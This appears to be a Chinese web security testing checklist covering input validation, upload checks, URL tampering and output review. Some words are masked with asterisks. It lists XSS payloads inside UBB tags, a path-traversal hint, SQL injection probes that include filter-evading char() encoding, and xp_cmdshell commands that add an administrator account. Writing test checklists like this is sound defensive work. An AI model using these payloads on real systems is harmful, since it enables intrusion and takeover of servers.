建立整體的威脅模型,測試溢位漏洞、資訊洩漏、錯誤處理、sql 注入、身份驗證和授權錯誤.
1、輸入驗證
客戶端驗證 伺服器端驗證(禁用指令碼除錯,禁用cookies)
1.輸入很大的數(如4,294,967,269),輸入很小的數(負數)
2.輸入超長字元,如對輸入文字長度有限制,則嘗試超過限制,剛好到達限制字數時有何反應
3.輸入特殊字元,如:~!@#$%^&*()_+<>:」{}|
4.輸入中英文空格,輸入字串中間含空格,輸入首尾空格
5.輸入特殊字串null,null,0x0d 0x0a
6.輸入正常字串
7.輸入與要求不同型別的字元,如: 要求輸入數字則檢查正值,負值,零值(正零,負零),小數,字母,空值; 要求輸入字母則檢查輸入數字
8.輸入html和j**ascript**
9.對於像回答數這樣需檢驗數字正確性的測試點,不僅對比其與問題最終頁的回答數,還要對回答進行新增刪除等操作後檢視變化
例如:1.輸入」gfhd,看是否出錯;
2.輸入,看是否出現文字框;
3.輸入看是否出現提示。
關於上傳:
1.上傳檔案是否有格式限制,是否可以上傳exe檔案;
2.上傳檔案是否有大小限制,上傳太大的檔案是否導致異常錯誤,上傳0k的檔案是否會導致異常錯誤,上傳並不存在的檔案是否會導致異常錯誤;
3.通過修改副檔名的方式是否可以繞過格式限制,是否可以通過壓包方式繞過格式限制;
4.是否有上傳空間的限制,是否可以超過空間所限制的大小,如將超過空間的大檔案拆分上傳是否會出現異常錯誤。
5.上傳檔案大小大於本地剩餘空間大小,是否會出現異常錯誤。
6.關於上傳是否成功的判斷。上傳過程中,中斷。程式是否判斷上傳是否成功。
7.對於檔名中帶有中文字元,特殊字元等的檔案上傳。
**:避免輸入:\..\web.
修改命名字尾。
1.某些需登入後或特殊使用者才能進入的頁面,是否可以通過直接輸入**的方式進入;
2.對於帶引數的**,惡意修改其引數,(若為數字,則輸入字母,或很大的數字,或輸入特殊字元等)後開啟**是否出錯,是否可以非法進入某些頁面;
3.搜尋頁面等url中含有關鍵字的,輸入html**或j**ascript看是否在頁面中顯示或執行。
4.輸入善意字元。
ubb:
你的**
1.試著用各種方式輸入ubb**,比如**不完整,**巢狀等等.
2.在ubb**中加入屬性,如樣式,事件等屬性,看是否起作用
3.輸入編輯器中不存在的ubb**,看是否起作用
鏈結email
[b style="background-image: url(j**ascript:alert('xss'))"]一首詩酸澀澀服務網[/b]
[i style="background-image: url(j**ascript:alert('xss'))"]一二三四五六七北京市[/i]
一二三四五六七北京市
[font=微軟雅黑" style="background-image: url(j**ascript:alert('xss'))"]一二三四五六七北京市[/font]
一二三四五六七北京市
一二三四五六七北京市
[align=center" style="background-image: url(j**ascript:alert('xss'))"]一二三四五六七北京市[/align]
[float=left" style="background-image: url(j**ascript:alert('xss'))"]一二三四五六七北京市[/float]
[font=微軟雅黑 style="background-image: url(j**ascript:alert('xss'))"]一二三四五六七北京市[/font]
一二三四五六七北京市
一二三四五六七北京市
[align=center style="background-image: url(j**ascript:alert('xss'))"]一二三四五六七北京市[/align]
一二三四五六七北京市
[indent]一二三四五六七北京市[/indent]
[float=left style="background-image: url(j**ascript:alert('xss'))"]一二三四五六七北京市[/float]
[media=ra,400,300,0]
輸出編碼
常用的測試輸入語句有:
對輸出資料到輸出資料的對比,看是否出現問題。
防止sql注入
admin--
『or --
『 and ( ) exec insert * % chr mid
and 1=1 ; and 1=1 ; and 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49) ; %20and%201=2
『and 1=1 ; 『and 1=1 ; 『and 1=1 ;
and 1=2 ; 『and 1=2
and 2=2
and user>0
and (select count(*) from sysobjects)>0
and (select count(*) from msysobjects)>0
and (select count(*) from admin)>=0
and (select top 1 len(username) from admin)>0(username 已知字段)
;exec master..xp_cmdshell 「net user name password /add」—
;exec master..xp_cmdshell 「net localgroup name administrators /add」—
and 0<>(select count(*) from admin)
簡單的如where xtype=』u』,字元u對應的ascii碼是85,所以可以用where xtype=char(85)代替;如果字元是中文的,比如where name=』使用者』,可以用where name=nchar(29992)+nchar(25143)代替。
跨站指令碼攻擊(xss)
對於 xss,只需檢查 html 輸出並看看您輸入的內容在什麼地方。它在乙個 href 標記中嗎?是否在 iframe 標記中?它在 clsid 標記中嗎?在 img src 中嗎?某些 flash 內容的 param name 是怎樣的?
測試用例(四)測試用例編寫
一.測試用例編寫方法 1.等價類劃分 如何選擇適當的資料子集,來代表整個資料集。通過降低測試的資料去實現 合理的 覆蓋,覆蓋了更多的可能資料,以發現更多的軟體缺陷 邊界值分析法 2.邊界值分析 使用邊界值分析方法設計測試用例時一般與等價類劃分結合起來,但它不是從乙個等價類中任選乙個例子作為代表,而是...
手機測試用例 STK測試用例
id 功能描述 操作步驟 預期結果 test time p fcomment tester test time p fcomment tester stk服務 sim卡適應性測試 1 選取支援stk功能的sim卡,插入手機中 手機應支援stk功能,會將stk選單自動加入主選單列表中 2 進入stk功...
手機測試用例 通話測試用例
id 功能描述 操作步驟 預期結果 test time p fcomment tester test time p fcomment tester 通話功能 快速檢視已撥 1 待機介面下按一下呼叫鍵可進入已撥 記錄 2 每次呼叫記錄都應正確無誤 號碼 時間 序號 通話時長等 3 呼叫記錄按呼叫時間順...